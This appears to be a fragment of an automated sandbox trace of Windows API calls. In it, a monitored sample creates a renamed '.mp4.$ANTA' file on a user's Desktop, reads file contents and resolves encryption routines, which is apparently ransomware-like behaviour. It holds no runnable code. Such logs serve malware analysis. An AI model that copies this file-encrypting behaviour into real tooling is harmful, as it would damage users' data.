RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0119.935] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0119.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.936] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\9irmcppbnuygc4yelr9w.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0119.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0119.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0119.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0119.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0119.937] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0119.937] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0119.938] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0119.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0119.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0119.941] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0119.941] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x50c5, lpOverlapped=0x0) returned 1 [0119.942] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0119.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0119.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x4516010 [0119.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x451b0e0 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.945] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x4516010 [0119.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0119.946] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0119.946] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x4516010 [0119.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0119.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0119.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0119.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x45201b0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0119.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0119.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0119.948] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0119.948] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0119.948] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0119.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0119.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0119.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0119.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0119.949] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0119.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.949] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0119.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0119.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.950] 